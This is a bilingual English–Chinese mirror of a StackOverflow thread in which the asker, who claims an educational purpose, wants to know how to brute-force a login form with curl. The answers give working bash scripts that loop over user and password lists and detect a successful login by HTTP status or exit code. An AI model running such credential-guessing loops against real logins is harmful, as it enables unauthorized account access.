bash 如何卷曲请求以暴力破解不安全的登录
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/21871428/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
How do I curl a request to bruteforce an unsecure login
提问by Joey Hipolito
Disclaimer:
免责声明:
This is for educational purposes only, and obviously the loginmodule is designed to be bruteforced.
这仅用于教育目的,显然该login模块被设计为暴力破解。
Question:
题:
I have login with a usersimilar to the pass. The useris a number like so:
我已经使用user类似于pass. 这user是一个像这样的数字:
1234001
I can login using a single request like so:
我可以像这样使用单个请求登录:
curl -iL --data-urlencode user="1234001" --data-urlencode password="1234001" http://foo.dev/login
Now the question is that how do, I loop with it, assuming that I received a 302 code if success
现在的问题是怎么做,我循环它,假设如果成功,我收到了一个 302 代码
url="http://foo.dev/login"
for i in 300; do
curl -iL --data-urlencode user="1234001" --data-urlencode password="1234001" http://foo.dev/login
// if????
done
采纳答案by Adaephon
I would suggest changing the curlinvocation a bit:
我建议curl稍微改变一下调用:
url="http://foo.dev/login"
for user in $(userlist_gen); do
for pass in $(passlist_gen); do
http_code=$(curl -L --data-urlencode user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s)
if [[ $http_code -eq 302 ]]; then
echo "Success: User: '$user' Pass: '$pass'"
break 2
fi
done
done
-o /dev/nullprints the returned website into/dev/null, essentially discarding it-iis not needed with the output going to/dev/null-ssuppresses any error messages (optional, but disables progress output)-w '%{http_code}'prints the HTTP response code to stdout after completed operation.
-o /dev/null将返回的网站打印到/dev/null,基本上将其丢弃-i不需要输出/dev/null-s抑制任何错误消息(可选,但禁用进度输出)-w '%{http_code}'完成操作后将 HTTP 响应代码打印到标准输出。
This code will loop over all user IDs generated by userlist_gen(maybe use seq 1234001 1234999for that) and then loop for each user over the passwords generated by passlist_gen. -o /dev/nulland -w '%{http_code}'leave only the HTTP response code as output on stdout, which is stored in $http_code. This is then compared for equality with 302and exits both loops on success. (If you want to try all users use just breakinstead of break 2.
此代码将遍历由userlist_gen(可能seq 1234001 1234999用于此目的)生成的所有用户 ID ,然后遍历每个用户生成的密码passlist_gen。-o /dev/null并-w '%{http_code}'仅将 HTTP 响应代码作为 stdout 的输出保留,该代码存储在$http_code. 然后将其与是否相等302并在成功时退出两个循环。(如果您想尝试所有用户使用 justbreak而不是break 2.
回答by MLSC
firstly:
首先:
cat input.txt
user1 pass1
user2 pass2
. .
. .
. .
Then try:
然后尝试:
#!/bin/bash
if [ $# -ne 1 ];then
echo "Usage: ./script <input-file>"
exit 1
fi
while read user pass; do
curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
if [ $? -eq 0 ];then
echo "ok"
elif [ $? -ne 0 ]; then
echo "failed"
fi
done <
Also HEREDOCsolution:
还有HEREDOC解决办法:
#!/bin/bash
while read user pass; do
curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
if [ $? -eq 0 ];then
echo "ok"
elif [ $? -ne 0 ]; then
echo "failed"
fi
done <<__HERE
user1 pass1
user2 pass2
. .
. .
. .
__HERE
回答by Gaurav
You can check the return value in following way:
您可以通过以下方式检查返回值:
curl -iL --data-urlencode user="1234001" --data-urlencode password="1234001" http://foo.dev/login; ret=$?
echo "return value is $ret"
if [ $ret != 0 ];then
echo "call failed"
fi
You need to put above code in a while loop. $? stores the exit status of the last command.
您需要将上面的代码放入 while 循环中。$? 存储最后一个命令的退出状态。
